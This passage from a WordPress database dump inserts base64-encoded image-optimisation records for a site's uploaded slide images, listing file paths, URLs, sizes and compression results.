INSERT INTO `wp_postmeta` VALUES (30392, 57, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjUwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC5qcGciLCJyZWR1Y3Rpb24iOjM5MDQxNywidGltZSI6MTQ4MzU5MDk2NCwiaWQiOiI1NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTY3LCJpZCI6NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTgwMHgyNTAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTgwMHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTgwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTY5LCJpZCI6NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTc2OHgyNDAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoyNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTc2OHgyNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTc2OHgyNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTcyLCJpZCI6NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTE2MDB4NTAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjUwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfb3JpZ2luYWwtMTYwMHg1MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTE2MDB4NTAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk3NSwiaWQiOjU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk3NywiaWQiOjU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk4MCwiaWQiOjU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk4MiwiaWQiOjU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC01MTB4NTAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NTAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC01MTB4NTAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC01MTB4NTAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk4NSwiaWQiOjU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTg3LCJpZCI6NTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfb3JpZ2luYWwtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfb3JpZ2luYWwtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfb3JpZ2luYWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5ODksImlkIjo1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk5MSwiaWQiOjU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX29yaWdpbmFsLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTk0LCJpZCI6NTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfb3JpZ2luYWwtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfb3JpZ2luYWwtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfb3JpZ2luYWwtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5OTYsImlkIjo1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC02MDB4NTAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC02MDB4NTAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNTAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9vcmlnaW5hbC02MDB4NTAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk5OSwiaWQiOjU3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30393, 56, 'wpfc_optimisation_reduction', '21386'); 
INSERT INTO `wp_postmeta` VALUES (30394, 56, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC5qcGciLCJ3aWR0aCI6MTkxNiwiaGVpZ2h0Ijo3NTksIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC5qcGciLCJyZWR1Y3Rpb24iOjIxMzcyLCJ0aW1lIjoxNDgzNTkxMDA3LCJpZCI6IjU2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwMTAsImlkIjo1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC04MDB4MzE3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6MzE3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTgwMHgzMTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtODAweDMxNy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwMTIsImlkIjo1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC03Njh4MzA0LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MzA0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTc2OHgzMDQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtNzY4eDMwNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwMTUsImlkIjo1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0xNjAweDYzNC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0Ijo2MzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMTYwMHg2MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMTYwMHg2MzQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDE5LCJpZCI6NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDIxLCJpZCI6NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDIzLCJpZCI6NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDI1LCJpZCI6NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDI4LCJpZCI6NTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwMzEsImlkIjo1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTAzMywiaWQiOjU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDM1LCJpZCI6NTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhc